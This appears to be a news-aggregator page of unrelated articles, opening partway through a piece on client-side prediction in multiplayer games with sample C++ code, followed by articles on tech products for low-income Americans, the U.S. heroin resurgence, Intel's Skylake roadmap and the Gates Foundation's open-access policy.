Now instead of each player running the same game code and communicating directly with each other, each player was now a “client” and they all communicated with just one computer called the “server”. There was no longer any need for the game to be deterministic across all machines, because the game really only existed on the server. Each client effectively acted as a dumb terminal showing an approximation of the game as it played out on the server.

In a pure client/server model you run no game code locally, instead sending your inputs, such as key presses, mouse movements and clicks, to the server. In response the server updates the state of your character in the world and replies with a packet containing the state of your character and other players near you. All the client has to do is interpolate between these updates to provide the illusion of smooth movement and *BAM* you have a networked client/server game.
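
A sketch of that interpolation step, with the types assumed for illustration: the client renders slightly in the past and blends between the two server snapshots that straddle the render time.

#include <deque>

struct Vec3 { float x, y, z; };
struct Snapshot { double serverTime; Vec3 position; };

Vec3 lerp(const Vec3& a, const Vec3& b, float t) {
  return { a.x + (b.x - a.x) * t,
           a.y + (b.y - a.y) * t,
           a.z + (b.z - a.z) * t };
}

// renderTime is typically ~100 ms behind the newest snapshot received.
Vec3 interpolate(const std::deque<Snapshot>& snaps, double renderTime) {
  if (snaps.empty()) return {0.0f, 0.0f, 0.0f};
  for (size_t i = 1; i < snaps.size(); ++i) {
    if (snaps[i].serverTime >= renderTime) {
      const Snapshot& a = snaps[i - 1];
      const Snapshot& b = snaps[i];
      float t = (float)((renderTime - a.serverTime) /
                        (b.serverTime - a.serverTime));
      return lerp(a.position, b.position, t);
    }
  }
  return snaps.back().position;  // ran past the buffer: hold the latest state
}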

This was a great step forward. The quality of the game experience now depended on the connection between the client and the server instead of the most lagged peer in the game. It also became possible for players to come and go in the middle of the game, and the number of players increased as client/server reduced the bandwidth required on average per-player.

But there were still problems with the pure client/server model:

While I can remember and justify all of my decisions about networking from DOOM through Quake, the bottom line is that I was working with the wrong basic assumptions for doing a good internet game. My original design was targeted at < 200ms connection latencies. People that have a digital connection to the internet through a good provider get a pretty good game experience. Unfortunately, 99% of the world gets on with a slip or ppp connection over a modem, often through a crappy overcrowded ISP. This gives 300+ ms latencies, minimum. Client. User's modem. ISP's modem. Server. ISP's modem. User's modem. Client. God, that sucks.

Ok, I made a bad call. I have a T1 to my house, so I just wasn't familliar with PPP life. I'm addressing it now.

The problem was of course latency.

What John did next when he released QuakeWorld would change the industry forever.

Client-Side Prediction

In the original Quake you felt the latency between your computer and the server. Press forward and you’d wait however long it took for packets to travel to the server and back to you before you’d actually start moving. Press fire and you wait for that same delay before shooting.

If you’ve played any modern FPS like Call of Duty: Modern Warfare, you know this is no longer what happens. So how exactly do modern FPS games seem to remove the latency on your own actions in multiplayer?

This problem was historically solved in two parts. The first part was client-side prediction of movement developed by John Carmack for QuakeWorld, and later incorporated as part of Unreal’s networking model by Tim Sweeney. The second part was latency compensation developed by Yahn Bernier at Valve for Counterstrike. In this section we’ll focus on that first part – hiding the latency on player movement.

When writing about his plans for the soon to be released QuakeWorld, John Carmack said:

I am now allowing the client to guess at the results of the users movement until the authoritative response from the server comes through. This is a biiiig architectural change. The client now needs to know about solidity of objects, friction, gravity, etc. I am sad to see the elegant client-as-terminal setup go away, but I am practical above idealistic.

So now in order to remove the latency, the client runs more code than it previously did. It is no longer a dumb terminal sending inputs to the server and interpolating between state sent back. Instead it is able to predict the movement of your character locally and immediately in response to your input, running a subset of the game code for your player character on the client machine.

Now as soon as you press forward, there is no wait for a round trip between client and server – your character starts moving forward right away.

The difficulty of this approach is not in the prediction, for the prediction works just as normal game code does – evolving the state of the game character forward in time according to the player’s input. The difficulty is in applying the correction back from the server to resolve cases when the client and server disagree about where the player character should be and what it is doing.

Now at this point you might wonder. Hey, if you are running code on the client – why not just make the client authoritative over their player character? The client could run the simulation code for their own character and simply tell the server where they are each time they send a packet. The problem with this is that if each player were able to simply tell the server “here is my current position” it would be trivially easy to hack the client such that a cheater could instantly dodge the RPG about to hit them, or teleport instantly behind you to shoot you in the back.

So in FPS games it is absolutely necessary that the server is authoritative over the state of each player character, in spite of the fact that each player is locally predicting the motion of their own character to hide latency. As Tim Sweeney writes in The Unreal Networking Architecture: “The Server Is The Man”.

Here is where it gets interesting. If the client and the server disagree, the client must accept the update for the position from the server, but due to latency between the client and server this correction is necessarily in the past. For example, if it takes 100ms from client to server and 100ms back, then any server correction for the player character position will appear to be 200ms in the past, relative to the time up to which the client has predicted their own movement.

If the client were to simply apply this server correction update verbatim, it would yank the client back in time such that the client would completely undo any client-side prediction. How then to solve this while still allowing the client to predict ahead?

The solution is to keep a circular buffer of past character state and input for the local player on the client. When the client receives a correction from the server, it first discards any buffered state older than the corrected state, then replays the local player’s movement from the corrected state forward to the present “predicted” time on the client, using the player inputs stored in the circular buffer. In effect the client invisibly “rewinds and replays” the last n frames of local player character movement while holding the rest of the world fixed.
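
Here is a hedged sketch of that rewind-and-replay scheme; the types and the movement code are stand-ins for illustration. The client stores each frame's input and predicted state in a circular buffer, and on a server correction it overwrites the old state and re-simulates forward to the present.

#include <array>
#include <cstdint>

struct Input { float moveX, moveY; bool jump; };
struct State { float x, y, z, vx, vy, vz; };

// Stand-in for the deterministic movement code shared with the server.
State simulate(const State& s, const Input& in, float dt) {
  State n = s;
  n.vx = in.moveX * 5.0f;
  n.vz = in.moveY * 5.0f;
  n.x += n.vx * dt; n.y += n.vy * dt; n.z += n.vz * dt;
  return n;
}

constexpr uint32_t BUFFER_SIZE = 1024;  // power of two, frames wrap cheaply

struct Prediction {
  std::array<Input, BUFFER_SIZE> inputs{};
  std::array<State, BUFFER_SIZE> states{};
  uint32_t currentFrame = 1;  // frame 0 holds the starting state

  // Every local frame: predict immediately and remember what we did.
  State predict(const Input& in, float dt) {
    State next = simulate(states[(currentFrame - 1) % BUFFER_SIZE], in, dt);
    inputs[currentFrame % BUFFER_SIZE] = in;
    states[currentFrame % BUFFER_SIZE] = next;
    ++currentFrame;
    return next;
  }

  // When the server's authoritative state for an old frame arrives:
  // accept it, then replay stored inputs from that frame up to the present.
  void correct(uint32_t serverFrame, const State& serverState, float dt) {
    states[serverFrame % BUFFER_SIZE] = serverState;
    for (uint32_t f = serverFrame + 1; f < currentFrame; ++f) {
      states[f % BUFFER_SIZE] = simulate(states[(f - 1) % BUFFER_SIZE],
                                         inputs[f % BUFFER_SIZE], dt);
    }
  }
};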

This way the player appears to control their own character without any latency, and provided that the client and server character simulation code is deterministic – giving exactly the same result for the same inputs on the client and server – it is rarely corrected. It is as Tim Sweeney describes:

… the best of both worlds: In all cases, the server remains completely authoritative. Nearly all the time, the client movement simulation exactly mirrors the client movement carried out by the server, so the client’s position is seldom corrected. Only in the rare case, such as a player getting hit by a rocket, or bumping into an enemy, will the client’s location need to be corrected.

In other words, only when the player’s character is affected by something external to the local player’s input, which cannot possibly be predicted on the client, will the player’s position need to be corrected. That, and of course, if that player is attempting to cheat.

If you enjoyed this article please donate.

Donations offset hosting costs and encourage me to write more articles!

What I Learned from Building an App for Low-Income Americans

25 November 2014 - 8:00am

I was lost in the Bronx. It was my first week as a Significance Labs Fellow, where my job was to create a tech product for some of the American households who earn less than $25,000 a year. In 2013, 45.3 million Americans lived at or below the poverty line, which for a family of four is $23,834.

Another fellow and I spent an hour on the subway from Brooklyn to do a user interview. This area of the Bronx has no cafes or shops, only the odd cluster of fast food joints around a subway station. Yellow cabs don’t drive here. We couldn’t find the address. Google Maps kept moving the location further away. Coming from the technology world, we were confounded when that technology failed us. Eventually, a car service dispatcher told us that the address didn’t exist.

To some extent technology has failed low-income Americans too. Developers don’t build apps for them. Growth hackers ignore them. At Significance Labs, I learned a lot about how low-income Americans live and use technology but also about its limitations, and my own.

It’s The Scarcity, Stupid

Our first week was spent in some of NYC’s poorest neighborhoods interviewing all kinds of people. We talked to a devoted teenage dad in Washington Heights, a school aide in Brownsville, and an undocumented Mexican immigrant who had built a good life for her family on 25 years of babysitting and cleaning jobs. When I asked what her ideal job would be she said “computer programmer.”

The product eventually built by my team was for housecleaners. My colleagues targeted the underbanked, elderly Android users, first-generation college students, and food stamp applicants.

Every person we met had an intensely individual story, but common themes emerged. Like most New Yorkers, our interviewees were busy. Many juggled multiple jobs, and sometimes school, with family responsibilities. Like other Americans, they often traded off time and convenience against cost.

It also became clear that inequality isn’t purely about income. It’s about information and status and opportunity. If you look at the dollar amount, my own income as a freelance writer probably wasn’t much higher than that of some of my interviewees, but I still had resources like educational credentials and social capital which many of them lacked. One of the reasons that graduation rates among low-income first generation college students hover at around 10% is that they don’t have the “college knowledge” taken for granted by their peers.

Living on a low income translates into other forms of scarcity: of power, information, respect, opportunity, time, health, security, and even of sleep. Our job was to build a piece of technology which could increase our users’ stock of at least one of those resources.

Your Users Won’t Trust You

A few years ago I interviewed a Mexican impact investor named Álvaro Rodríguez Arregui. He explained that impact investors need to be very clear about their motives. “Do you want to do good, or do you want to feel good?” he said. “It’s much easier to feel good by giving away meals to starving kids in Sudan, but you are not going to solve any systemic problem in the world by doing that. This is business, and business is messy and you have to make hard decisions.”

I often didn’t feel good. Sometimes that was because I had to make hard decisions, sometimes because people didn’t understand why we were building mobile tech for domestic workers. All the teams at Significance Labs worked for significantly below market rates. They left jobs, or in my case, even countries. That makes it all the more unsettling when your potential users misunderstand or mistrust you. They have good reasons.

When doing nonprofit or volunteer work it’s all too easy to congratulate yourself for taking on the work at all.

My team worked closely with housecleaners to build Neatstreak. We assembled a panel of "superusers" who tested multiple versions and suggested features we implemented. Cleaners were often delighted just to have someone ask them about their work. People rarely do.

Nevertheless we often had trouble persuading housecleaners and other domestic workers to come to interviews, even though we paid $25 per hour, which was higher than their regular hourly rate. They didn’t know us and it looked too good to be true. Low-income Americans are often the targets of scams which advertise fake education credentials or applications for government benefits.

In the last week of the program one of Neatstreak’s superusers mailed me to say that he felt slighted. “I'm starting to feel like when corporate America uses the little guy for ideas and then forgets about them,” he said. “I was excited and ready to be hands on but instead feel used for my ideas." During a user testing session with a group of Spanish-speaking cleaners, one of the testers gave a speech to the others about how we were a company (Significance Labs is a nonprofit) trying to take advantage of them. When building for low-income users you have to work harder to win their trust and to demonstrate your product’s value.

There Isn’t Always A Technical Solution

Technologists are problem solvers. It’s tempting to either jump in too quickly with a technical solution to an intractable systemic or human problem or to be discouraged by its difficulty. One of my first interviews was with a 21-year-old father of two, Angel. Angel was in foster care before he turned 1 and had been in trouble with the law as a teenager. What he really needed was a steady job which would provide him with an income for his family. No mobile app I could build in three months was going to deliver that.

Another issue was impact versus scale. Should we try to solve a smaller problem for a large number of people or have a bigger impact on a smaller group? Angel had attended Green City Force (GCF), an impressive program in Brooklyn where low-income young people do six months of national service related to the environment and are prepared for sustainable careers. GCF had a huge impact on the graduates we met but this kind of “high-touch” program is not where technology excels. Our best bet might be to create a little more breathing space for a large number of people.

My colleague Jimmy Chen, for example, built a mobile app called EasyFoodStamps to do the first stage of the application for food stamps, saving people hours of standing in queues at the food stamp office. When you lose a day's work or have to get a babysitter to watch your kids in order to apply, that really makes a difference.

Furnishing a naive technical fix is the software equivalent of building a well in a developing country which the locals have neither the motivation nor the skill to maintain. You have to understand the whole context. For example, housecleaners prefer to be paid in cash (so mobile payments were out), mainly use text messaging, and sometimes don’t want to reveal professional information online, especially if they are undocumented.

The U.S. has a serious inequality problem. The top 0.1% of Americans own more than the bottom 90%. Technology in many cases has made that inequality worse by eliminating jobs or replacing them with more insecure ones. Disruption is all very well when you are one of the beneficiaries. The tech business has a moral obligation to see what it can do to help.

But I am also convinced that there are sustainable, if not wildly profitable, businesses to be built on providing valuable services to low-income Americans. At Significance Labs, essentially we made bottom-of-the-pyramid products for the developed world. Nearly one in four New Yorkers rely on food stamps and 40,000 more apply every week. Multiple companies chase their dollars outside the food stamp office. We estimated that housecleaners work in 20 million homes in the U.S. These are big numbers.

One of impact investor Rodríguez Arregui's investments in Mexico is Finestrella, a successful startup which developed a set of algorithms to assess the creditworthiness of people who don’t have an official employment history, bank account, or credit rating, in order to offer them a mobile phone plan which costs much less than pre-paid. Two Silicon Valley VC funds with no impact investing mandate, Storm Ventures and Bay Partners, have also invested in Finestrella.

Maybe the best long-term solution is to train a new generation of developers and designers from a low-income background to build their own solutions, but that's easier said than done. People on low incomes already lead a precarious life juggling multiple, low-paying, no-benefits jobs or government support. The last thing they want is more risk of the kind that is involved in launching a startup.

On the other hand, it's striking that all six Significance Labs Fellows are zero or first-generation immigrants. Jimmy was born in China. Margo grew up in Ghana. They went on to Ivy League schools and jobs at companies like Facebook and LinkedIn, but their families know what it was like to live a very different life.

Many of the housecleaners I met were already entrepreneurs. Our office cleaner at Significance Labs, Jason, employed five or six people in his cleaning business while also holding down another full-time job. The best thing about my time at Significance Labs was meeting incredible people like Jason and Angel. The most fun I had last summer was sitting in a room chatting to housecleaners.

Drug addiction: The great American relapse

25 November 2014 - 8:00am

PICTURE a heroin addict. “A bum sitting under a bridge with a needle in his arm, robbing houses to feed his addiction,” is what many people might imagine, believes Cynthia Scudo. That image may have been halfway accurate when heroin first ravaged America’s inner cities in the 1960s and 1970s. But Ms Scudo, a smartly dressed young grandmother from a middle-class Denver suburb, knows that these days it is not always like that. Until not so long ago, she was a heroin addict herself.

The face of heroin use in America has changed utterly. Forty or fifty years ago heroin addicts were overwhelmingly male, disproportionately black, and very young (the average age of first use was 16). Most came from poor inner-city neighbourhoods. These days, the average user looks more like Ms Scudo. More than half are women, and 90% are white. The drug has crept into the suburbs and the middle classes. And although users are still mainly young, the age of initiation has risen: most first-timers are in their mid-20s, according to a study led by Theodore Cicero of Washington University in St Louis.

The spread of heroin to a new market of relatively affluent, suburban whites has allowed the drug to make a comeback, after decades of decline. Over the past six years the number of annual users has almost doubled, from 370,000 in 2007 to 680,000 in 2013. Heroin is still rare compared with most other drugs: cannabis, America’s favourite (still mostly illegal) high, has nearly 50 times as many users, for instance. But heroin’s resurgence means that, by some measures, it is more popular than crack cocaine, the bogeyman of the 1980s and 1990s. Its increased popularity in America contrasts strongly with Europe, where the number of users has fallen by a third in the past decade. What explains America’s relapse?

A shot in the arm

Like many of America’s new generation of users, Ms Scudo never intended to take up the drug. Her addiction began in 2000 when, after a hip injury, a doctor prescribed her “anything and everything” to relieve the pain. This included a high dose of OxyContin, a popular brand of opioid pill. Her prescription was later reduced, but she was already hooked. On the black market OxyContin pills cost $80 each, more than she could afford to cover her six-a-day habit; so she began selling her pills and using the proceeds to buy cheaper heroin. As if from nowhere, Ms Scudo had become a heroin addict.

Thousands more have gone down this path. The 1990s saw a big increase in prescriptions of opioids for chronic pain. In some states the number of opioid prescriptions written each year now exceeds the number of people. That oversupply feeds the black market: last year 11m Americans used illicitly-acquired prescription painkillers, more than the number who used cocaine, ecstasy, methamphetamine and LSD combined. People who would never dream of injecting heroin seem to assume that opioids in packets are safe.

But they aren’t. In 2012 prescription painkillers accounted for 16,000 deaths—nearly four out of every ten fatal drug overdoses in America. As the toll grew, some states tightened up the law. In many places doctors must now check databases to make sure the patient has not already been prescribed painkillers by another clinic. Prescriptions have been cut down to as little as a single pill, to reduce the supply of unfinished packets. “Pill mills”, clinics that churned out prescriptions with no questions asked, have been shut down. And drug manufacturers have made their medicines harder to abuse: the latest OxyContin pills, when crushed, turn into a gloop that cannot easily be snorted or dissolved for injection.

These measures have had some impact: rates of prescription-drug abuse and of overdose have dipped a little in the past two years. But as the supply of pain pills has dropped, and their black-market price has risen, many addicts have turned to heroin to satisfy their craving more cheaply. “We saw it coming at us at 90mph, like a freight train,” says Meghan Ralston of the Drug Policy Alliance, a drug-reform pressure group. The number of deaths from heroin overdoses doubled between 2010 and 2012, and many of those attending addiction clinics are college-age, middle-class types who started on prescription pills.

The Mexican wave

Just as the demand side of America’s heroin market was heating up, so too was supply. Though Afghanistan accounts for 80% of global opium production, America gets most of its heroin from Mexico. Historically that has checked consumption, since Mexico has long been a relatively small producer of opium poppies.

In the past few years the Mexicans have upped their game. One of the many unintended consequences of Mexico’s war on organised crime in urban hotspots, such as Ciudad Juárez, was that the army was diverted from poppy eradication in the countryside. Farmers in the Sierra Madre made the most of this: by 2009 cultivation was ten times higher than in 2000. Although production has fallen back in the past few years, Mexico is now the world’s third-biggest producer of opium, after Afghanistan and Myanmar.

Policy changes in America have given Mexico’s narco-farmers further incentives to focus on opium. Until not so long ago, Mexican traffickers made a lot of their money from cannabis. But these days most of the cannabis in America is home-grown. Nearly half the states have legalised medical marijuana, and four have voted to legalise it outright. Exporting pot to the United States is now like taking tequila to Mexico. Facing a glut in the cannabis market, Mexican farmers have turned to poppies.

America’s police have seen the impact. Seizures of heroin at the border with Mexico have risen from 560kg (1,230lb) in 2008 to about 2,100kg last year. And the smugglers have become bolder. “Three or four years ago, 5lb was big. Now sometimes we’re finding 20lb,” says Kevin Merrill, the assistant special agent in charge of the Drug Enforcement Administration on the outskirts of Denver.

The low transport costs faced by Mexican traffickers, who need only drive from Sinaloa to the border, mean that their heroin is far cheaper than the Colombian or Asian sort. A gram of pure heroin in America now costs about $400, less than half the price, in real terms, that it cost in the 1980s. And whereas much of the heroin in the past was of the “black tar” variety, which is usually injected, there is a trend towards brown heroin, which lends itself better to snorting and smoking. That matters to novice heroin users, who may be skittish about needles. “I somehow thought that if I didn’t inject it, I wasn’t a heroin addict,” says Ms Scudo, who smoked it instead.

As fewer people are introduced to prescription opioids, the number who are vulnerable to heroin addiction will also eventually fall. “Things are getting a little better,” says Patrick Fehling, a psychiatrist at the CeDAR rehabilitation clinic in Denver, where Ms Scudo eventually kicked her habit. Yet services like these are scarce, particularly for the poor: a month at CeDAR costs $27,000. Those with no money or insurance are more likely to be put on methadone, a heroin substitute which sates cravings but does not stop them.

Now that heroin addiction is no longer a disease only of the urban poor, however, attitudes are changing. The Obama administration’s latest national drug strategy, published in July, criticised “the misconception that a substance-use disorder is a personal moral failing rather than a brain disease”. It called for greater access to naloxone, an antidote that can reverse the effects of heroin overdose, and backed state-level “good Samaritan” laws, which give immunity to people who call 911 to help someone who is overdosing. Needle-exchange services, which have cut rates of hepatitis and HIV among drug users in Europe, are expanding. These programmes are easier for politicians to sell now that heroin addiction is no longer just the “bum under the bridge”.

Intel’s 6th Generation Skylake Processors Scheduled for 2H 2015

25 November 2014 - 8:00am

Intel has once again updated its processor roadmap, showing that it is on schedule with upcoming products such as Skylake, Broadwell, Braswell and the new mobility cores. There have been widespread rumors that Intel would delay its Skylake processors to 2016, but a second roadmap update debunks those claims, showing that 2015 will be a major year for processor architecture and technology, with the simultaneous launch of a Tick (Broadwell) and a Tock (Skylake).

Image credit: ZDNet

As we know, Intel has already launched the first iteration of its chips based on the Broadwell architecture, codenamed “Core M”. We did a fairly detailed analysis of Core M (Broadwell-Y) a few months ago, and from the looks of it, Core M is built on a true 14nm node from Intel; the same node will carry over to the performance-oriented chips arriving in spring 2015. Intel’s Core M is being adopted by performance tablets and mainstream notebooks this quarter, with reviews already hitting the web, while the performance SKUs arriving in spring 2015 will be featured in high-performance notebooks and all-in-one PCs.

In all honesty, Broadwell is just a node shrink, with an average IPC improvement of around 5%, give or take a few percentage points. Broadwell does, however, come with some power enhancements, and those are a good fit for the notebook and mobility side of things, with TDPs of 15/28W on the BGA chips. Braswell, on the other hand, is based on the 14nm Airmont architecture and will be an SoC / BGA chip for the J-Series processors, coming in sub-10W TDPs. It will be adopted in Celeron and Pentium series SKUs and is a direct competitor for AMD’s AM1 series parts given its power and pricing range. Braswell will feature the 8th generation graphics chip that also appears on modern Broadwell processors, along with the DirectX 11 API and both Windows and Android OS support.

So much for the mobility parts; we will come back to them after detailing the desktop parts. Server and desktop parts are usually considered the meat of any given CPU architecture, showcasing its real potential, and in 2015 Intel will launch two desktop parts: Broadwell-K and Skylake-S. We have given you details on these parts several times before, but let’s recap. A roadmap update showcased two weeks ago revealed Broadwell-K (unlocked) to be arriving in 1H 2015. Broadwell-K will be compatible with LGA 1150 socketed motherboards featuring the 9-Series chipsets (Z97/H97). Broadwell-K is similar to Devil’s Canyon, the enthusiast Haswell parts built for overclockers. You could call these Devil’s Canyon II (not an official name); they will be part of Intel’s 5th Generation Core family, featuring the Core i5-5000 and Core i7-5000 series processors.

Intel 5th Generation Broadwell – Core i7-5000 and Core i5-5000 Series Processors

The desktop chips have been confirmed to feature Intel’s 8th generation Iris Pro graphics. The Iris Pro graphics chip features double the execution units of the HD 4600 (40 vs 20) and comes with its own 128 MB of on-package eDRAM, codenamed ‘Crystalwell’. This super-fast last-level cache supplies the Iris Pro graphics chip with 25.6GB/s of system memory bandwidth plus 50GB/s of eDRAM bandwidth in each direction, which fulfills its bandwidth requirement. The Crystalwell eDRAM sits on a separate die on the CPU package. The 8th generation graphics on Broadwell will feature a total of 48 execution units, with support for the DirectX 12 API, the VP8 codec, 2xMSAA, improved tessellation and low CPU overhead. We can also confirm that, just like Haswell, Broadwell will have a voltage regulator on chip, along with an on-chip power controller; this will allow low-power states as deep as C10. The U and H variants will both support the Extreme Tuning Utility, which allows easy overclocking of both the CPU and the GPU. Given all that, we can expect better performance from the Broadwell line of Core processors.
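To put those bandwidth figures in perspective, here is a minimal back-of-the-envelope sketch (our own illustration, not an Intel spec sheet): peak memory bandwidth follows from transfer rate and bus width. The dual-channel DDR3-1600 system-memory configuration is an assumption on our part; the 50GB/s-per-direction eDRAM figure is the one quoted above.

# Rough peak-bandwidth arithmetic; the memory configuration is assumed, not confirmed.
def peak_bandwidth_gbs(transfer_rate_mts, bus_width_bits=64, channels=1):
    # transfers per second * bytes per transfer * number of channels
    return transfer_rate_mts * 1e6 * (bus_width_bits / 8) * channels / 1e9

system_memory = peak_bandwidth_gbs(1600, channels=2)    # dual-channel DDR3-1600 (assumed)
edram_each_way = 50.0                                   # GB/s per direction, as quoted above

print(f"System memory: {system_memory:.1f} GB/s")       # ~25.6 GB/s
print(f"eDRAM total:   {2 * edram_each_way:.0f} GB/s")  # 50 GB/s each way

The arithmetic reproduces the 25.6GB/s system-memory figure and shows why the on-package eDRAM is such a large bandwidth boost for the GPU.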

Intel 6th Generation Skylake – Core i7-6000 and Core i5-6000 Series Processors

The second desktop update will arrive in 2H 2015 in the form of Skylake-S. Skylake is also built on the 14nm process, but it is a new microarchitecture designed from the ground up. The Skylake-S processors, which form the mainstream line, will be branded as the 6th Generation Core i5-6000 and Core i7-6000 parts. Skylake will be compatible with LGA 1151 socketed motherboards based on the 100-Series (Z170/H170) Sunrise Point chipsets. Just like Haswell Refresh, these S-Series parts will not feature any unlocked SKUs, but they will give users an early experience of Intel’s new mainstream platform with DDR4 compatibility, which on the consumer front currently exists only on the HEDT X99 platform.

The transition to the Z170 chipset will not be a massive upgrade; it will be similar to the move from Z87 to Z97, with a few added features such as more PCI-e lanes, SuperSpeed USB and up to 10 USB 3.0 ports, compared to the 6 standard ones found on the current iteration of motherboards. There will be a total of six 100-Series chipset SKUs: the Z170 (Performance) replacing the Z97, the H170 (Mainstream) replacing the H97, the H110 (Value) replacing the H81, the B150 (Small and Medium Business) replacing the B85, and the Q170 plus Q150 chips with Intel vPro / SIPP replacing the Q87 and Q85. As you can see, Intel has an entire replacement plan ready to update the current desktop chipset stack in 2015, and is already phasing out its Ivy Bridge-E parts and Z77/H77/H75/Q75 chipsets in early 2015. The transition won’t eliminate support for Z97 or Z87 in 2015, since the majority of consumers will still be running Broadwell and Haswell processors; those platforms have had a longer shelf life in the market and will continue to exist alongside the new one for a couple of years.

The Z170 will be the flagship performance chipset, supporting the unlocked K-Series Skylake processors, which I don’t believe will be available in early 2015 but will launch a bit later. The chipset will feature up to 20 PCIe Gen 3 lanes, 6 SATA 3 ports, 10 USB 3.0 ports out of 14 total USB ports (USB 3.0 / USB 2.0), up to 3 SATA Express capable ports, and up to 3 Intel RST capable PCI-e storage ports, which may include x2 SATA Express or M.2 SSD ports, with Enhanced SPI and x4/x8/x16 capable Gen 3 PCI-Express support from the processor. Aside from that, we know that the Skylake processors will be compatible with the latest LGA 1151 socketed boards and the Z170 chipset, part of the new 100-Series lineup replacing the 9-Series “Wild Cat Point” PCH. The second most interesting detail is that Skylake processors will have both DDR3 and DDR4 memory controllers, so different SKUs can be configured to use either memory type.
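To see what the DDR4 controller buys in practice, the quick comparison below computes theoretical peak bandwidth at the two memory speeds listed in the SKU table further down; the dual-channel, 64-bit-per-channel desktop configuration is our assumption rather than a confirmed Skylake-S specification.

# Peak bandwidth = MT/s * 8 bytes per 64-bit transfer * 2 channels (assumed config)
for name, mts in [("DDR3L-1600", 1600), ("DDR4-2133", 2133)]:
    gbs = mts * 1e6 * 8 * 2 / 1e9
    print(f"{name}: {gbs:.1f} GB/s")  # 25.6 GB/s vs ~34.1 GB/s

At these speeds DDR4-2133 offers roughly a third more peak bandwidth than DDR3L-1600, which is the practical upside of shipping both memory controllers.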

Intel Skylake-S and Skylake SKUs Configuration:


Intel 14nm Skylake Configuration Table

Variant                   SKL-Y (BGA)    SKL-U (BGA)    SKL-H (BGA)    SKL-S (LGA)
Core Configurations       2              2 / 2          4 / 4          4 / 2 / 4
Graphics Configurations   GT2            GT2 / GT3e     GT2 / GT4e     GT2 / GT2 / GT4e
eDRAM                     -              64MB (GT3e)    128MB (GT4e)   64MB (GT4e)
Memory                    LPDDR3-1600    LPDDR3-1600    DDR4-2133      DDR3L/DDR3L-RS-1600, DDR4-2133
TDP                       4W             15-28W         35-45W         35-95W

The TDPs for the Skylake processors were also confirmed last month, further detailing the various core configurations of the Skylake SKUs. The desktop lineup will have six variants, including flagship 95W quad cores with GT2 and GT4e GPUs, while the lowest, 35W TDP variant will feature dual cores and GT2 graphics. The H-Series lineup will also include a 95W quad core with the GT4e graphics chip, its only flagship chip, followed by 65W, 55W and 45W quad-core variants with a mix of GT4e and GT2 graphics. Skylake will also get rid of the FIVR (Fully Integrated Voltage Regulator) featured on the Haswell generation of processors; the design will continue to be used through the Broadwell processors in 1H 2015, after which Intel will abandon it.

The H-Series doesn’t seem to include a dual-core model at all. The U-Series lineup will have TDPs of 25W and 15W, with the flagship parts featuring dual cores and GT3e graphics while the other models get GT2 graphics. Last up is the Y-Series Skylake lineup, featuring two SKUs, both with a 4.5W TDP, two cores and GT2 graphics. The difference between them is not clearly stated, but we think it’s related to clock speeds. You can get a better representation of the variants in the following chart:

SKU          x86 Cores   Graphics   TDP
Skylake DT   4           GT4e       95W
Skylake DT   4           GT2        95W
Skylake DT   4           GT2        65W
Skylake DT   2           GT2        65W
Skylake DT   2           GT2        35W
Skylake DT   4           GT2        35W
H-Series     4           GT4e       95W
H-Series     4           GT4e       65W
H-Series     4           GT4e       55W
H-Series     4           GT4e       45W
H-Series     4           GT2        65W
H-Series     4           GT2        55W
H-Series     4           GT2        45W
U-Series     2           GT3e       25W
U-Series     2           GT3e       15W
U-Series     2           GT2        25W
U-Series     2           GT2        15W
Y-Series A   2           GT2        4.5W
Y-Series B   2           GT2        4.5W

We will also get several new wireless technologies on the 100-Series chipset: Snowfield Peak (WiFi + Bluetooth) replacing Wilkins Peak, Douglas Peak (WiGig + WiFi + BT) replacing Stone Peak and Maple Peak, and the Pine Peak plus WWAN LTE chips (XMM 726x) replacing the WWAN XMM 7160 for wireless connectivity. Intel is also introducing the latest Alpine Ridge Thunderbolt controller with Skylake, pushing speeds of 40Gb/s, double that of the last generation. For LAN, Intel will introduce Jacksonville to replace Clarksville. Samples of the Skylake-S CPUs were already demonstrated by Intel at IDF14 this year, and just recently a Skylake-S ES was pictured with a 2.4 GHz base and 2.9 GHz boost clock (95W TDP). This suggests that Skylake-S is on schedule.

Intel Mainstream Platforms Comparison Chart:

Platform       Process   Cores (Max)   Chipset                       Socket     Memory        Thunderbolt            Launch
Sandy Bridge   32nm      4             6-Series “Cougar Point”       LGA 1155   DDR3          Yes                    2011
Ivy Bridge     22nm      4             7-Series “Panther Point”      LGA 1155   DDR3          Yes                    2012
Haswell        22nm      4             8-Series “Lynx Point”         LGA 1150   DDR3          Yes                    2013-2014
Broadwell      14nm      4             9-Series “Wild Cat Point”     LGA 1150   DDR3          Yes                    2015
Skylake        14nm      4             100-Series “Sunrise Point”    LGA 1151   DDR4 / DDR3   Yes (“Alpine Ridge”)   2015
Cannonlake     10nm      TBA           200-Series “Union Point”      TBA        DDR4          Yes                    2016

All of the above are desktop LGA platforms.

Intel Mobility Update With Broxton, SoFIA MID, SoFIA LTE 2

Back on the mobile front, Intel has three updates for 2016, led by Broxton (a quad-core SoC based on 14nm Goldmont), which will be featured in performance mobile platforms, while SoFIA MID will cover the mid-tier quad-core LTE solutions. The performance side of 2015 will be updated with Cherry Trail and Moorefield, while on the value side, SoFIA 3G (dual core), SoFIA 3G-R (quad core) and SoFIA LTE (quad core with LTE) parts will launch in 2015; 2016 will bring the SoFIA LTE 2 update based on the 14nm process.


Gates Foundation to require immediate free access for journal articles

25 November 2014 - 8:00am


Breaking new ground for the open-access movement, the Bill & Melinda Gates Foundation, a major funder of global health research, plans to require that the researchers it funds publish only in immediate open-access journals.

The policy doesn’t kick in until January 2017; until then, grantees can publish in subscription-based journals as long as their paper is freely available within 12 months. But after that, the journal must be open access, meaning papers are free for anyone to read immediately upon publication. Articles must also be published with a license that allows anyone to freely reuse and distribute the material. And the underlying data must be freely available.

The immediate access requirement goes further than policies of other major biomedical research funders in the United States and Europe. Most encourage their researchers to publish in immediate open-access journals, but allow delayed access after an embargo of 6 to 12 months. (Most subscription-based journals, including Science, allow authors to comply with those policies.) The Gates Foundation will also pay the author fees charged by many open-access journals.

“By reinforcing the global health community’s commitment to sharing research data and information, we can accelerate the development of new solutions to tackle infectious diseases, cut maternal and child mortality, and reduce malnutrition in the world’s poorest places,” wrote Trevor Mundel, president of the foundation’s Global Health Division, on the group’s website on 20 November.

The policy is “truly a giant step forward for Open Access policies!!” wrote Heather Joseph, executive director of the open-access advocacy group SPARC in Washington, D.C., in an e-mail to the group’s members.

The Gates Foundation spends about $900 million a year on its global health programs, mostly on research. That results in roughly 1400 research papers a year, 30% of which now appear in open-access journals, according to foundation communications officer Amy Enright.